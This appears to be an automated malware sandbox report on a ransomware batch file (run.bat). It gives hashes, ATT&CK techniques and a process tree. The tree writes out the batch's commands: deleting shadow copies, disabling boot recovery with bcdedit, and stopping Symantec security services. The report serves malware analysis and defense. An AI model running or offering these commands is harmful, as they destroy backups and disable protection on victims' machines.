b9089e998c8b58b04f40aafd9957a68d7c3efa42d0a8137db037abeab6b7e117

Analysis

max time kernel
145s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
12-01-2023 22:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

run.bat
Size

714B
MD5

090f5292edb66547a84094521f168cf9
SHA1

3b6b4a4dbfb8642b43624a48a06965dc07c4544f
SHA256

50ac2f51e0bd5a497332633e6705fb206dbcd58523fb9e5d8ed5163e3a76b134
SHA512

14d030744039d646401db5c5e49b2b80218ce05bb07f744b6926751f6d652ee7f809375c37c183f34be2535f6b5c5e5cd3aee8877ea7d130c73e11269b77e427

Score

9^/10

evasion ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2576	bcdedit.exe
1448	bcdedit.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2484	vssadmin.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeBackupPrivilege	2496	vssvc.exe
Token: SeRestorePrivilege	2496	vssvc.exe
Token: SeAuditPrivilege	2496	vssvc.exe
Token: SeIncreaseQuotaPrivilege	4076	WMIC.exe
Token: SeSecurityPrivilege	4076	WMIC.exe
Token: SeTakeOwnershipPrivilege	4076	WMIC.exe
Token: SeLoadDriverPrivilege	4076	WMIC.exe
Token: SeSystemProfilePrivilege	4076	WMIC.exe
Token: SeSystemtimePrivilege	4076	WMIC.exe
Token: SeProfSingleProcessPrivilege	4076	WMIC.exe
Token: SeIncBasePriorityPrivilege	4076	WMIC.exe
Token: SeCreatePagefilePrivilege	4076	WMIC.exe
Token: SeBackupPrivilege	4076	WMIC.exe
Token: SeRestorePrivilege	4076	WMIC.exe
Token: SeShutdownPrivilege	4076	WMIC.exe
Token: SeDebugPrivilege	4076	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4076	WMIC.exe
Token: SeRemoteShutdownPrivilege	4076	WMIC.exe
Token: SeUndockPrivilege	4076	WMIC.exe
Token: SeManageVolumePrivilege	4076	WMIC.exe
Token: 33	4076	WMIC.exe
Token: 34	4076	WMIC.exe
Token: 35	4076	WMIC.exe
Token: 36	4076	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4076	WMIC.exe
Token: SeSecurityPrivilege	4076	WMIC.exe
Token: SeTakeOwnershipPrivilege	4076	WMIC.exe
Token: SeLoadDriverPrivilege	4076	WMIC.exe
Token: SeSystemProfilePrivilege	4076	WMIC.exe
Token: SeSystemtimePrivilege	4076	WMIC.exe
Token: SeProfSingleProcessPrivilege	4076	WMIC.exe
Token: SeIncBasePriorityPrivilege	4076	WMIC.exe
Token: SeCreatePagefilePrivilege	4076	WMIC.exe
Token: SeBackupPrivilege	4076	WMIC.exe
Token: SeRestorePrivilege	4076	WMIC.exe
Token: SeShutdownPrivilege	4076	WMIC.exe
Token: SeDebugPrivilege	4076	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4076	WMIC.exe
Token: SeRemoteShutdownPrivilege	4076	WMIC.exe
Token: SeUndockPrivilege	4076	WMIC.exe
Token: SeManageVolumePrivilege	4076	WMIC.exe
Token: 33	4076	WMIC.exe
Token: 34	4076	WMIC.exe
Token: 35	4076	WMIC.exe
Token: 36	4076	WMIC.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2780 wrote to memory of 2484	2780	cmd.exe	80
PID 2780 wrote to memory of 2484	2780	cmd.exe	80
PID 2780 wrote to memory of 4076	2780	cmd.exe	83
PID 2780 wrote to memory of 4076	2780	cmd.exe	83
PID 2780 wrote to memory of 2576	2780	cmd.exe	84
PID 2780 wrote to memory of 2576	2780	cmd.exe	84
PID 2780 wrote to memory of 1448	2780	cmd.exe	85
PID 2780 wrote to memory of 1448	2780	cmd.exe	85
PID 2780 wrote to memory of 2256	2780	cmd.exe	86
PID 2780 wrote to memory of 2256	2780	cmd.exe	86
PID 2780 wrote to memory of 4320	2780	cmd.exe	87
PID 2780 wrote to memory of 4320	2780	cmd.exe	87
PID 2780 wrote to memory of 4284	2780	cmd.exe	88
PID 2780 wrote to memory of 4284	2780	cmd.exe	88
PID 4284 wrote to memory of 4584	4284	net.exe	89
PID 4284 wrote to memory of 4584	4284	net.exe	89
PID 2780 wrote to memory of 1032	2780	cmd.exe	90
PID 2780 wrote to memory of 1032	2780	cmd.exe	90
PID 1032 wrote to memory of 1796	1032	net.exe	91
PID 1032 wrote to memory of 1796	1032	net.exe	91
PID 2780 wrote to memory of 3808	2780	cmd.exe	92
PID 2780 wrote to memory of 3808	2780	cmd.exe	92
PID 3808 wrote to memory of 116	3808	net.exe	93
PID 3808 wrote to memory of 116	3808	net.exe	93
PID 2780 wrote to memory of 4356	2780	cmd.exe	94
PID 2780 wrote to memory of 4356	2780	cmd.exe	94
PID 4356 wrote to memory of 1544	4356	net.exe	95
PID 4356 wrote to memory of 1544	4356	net.exe	95

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\run.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2780
- C:\Windows\system32\vssadmin.exe
  vssAdmiN delete shaDows /all /quIet
  2⤵
  - Interacts with shadow copies
  PID:2484
- C:\Windows\System32\Wbem\WMIC.exe
  wMic shadOwcopy dElete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4076
- C:\Windows\system32\bcdedit.exe
  bCdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2576
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1448
- C:\Windows\system32\cmd.exe
  cmd.exe /c "C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\Smc.exe" -stop
  2⤵
  PID:2256
- C:\Windows\system32\cmd.exe
  cmd.exe /c "C:\Program Files\Symantec\Symantec Endpoint Protection\smc.exe" -p 123 -stop
  2⤵
  PID:4320
- C:\Windows\system32\net.exe
  net stop ΓÇ£Symantec Endpoint ProtectionΓÇ¥
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4284
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ΓÇ£Symantec Endpoint ProtectionΓÇ¥
    3⤵
    PID:4584
- C:\Windows\system32\net.exe
  net stop ΓÇ£Symantec Event ManagerΓÇ¥
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ΓÇ£Symantec Event ManagerΓÇ¥
    3⤵
    PID:1796
- C:\Windows\system32\net.exe
  net stop ΓÇ£Symantec Settings ManagerΓÇ¥
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3808
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ΓÇ£Symantec Settings ManagerΓÇ¥
    3⤵
    PID:116
- C:\Windows\system32\net.exe
  net stop ΓÇ£Symantec Network Access ControlΓÇ¥
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ΓÇ£Symantec Network Access ControlΓÇ¥
    3⤵
    PID:1544

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2496

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads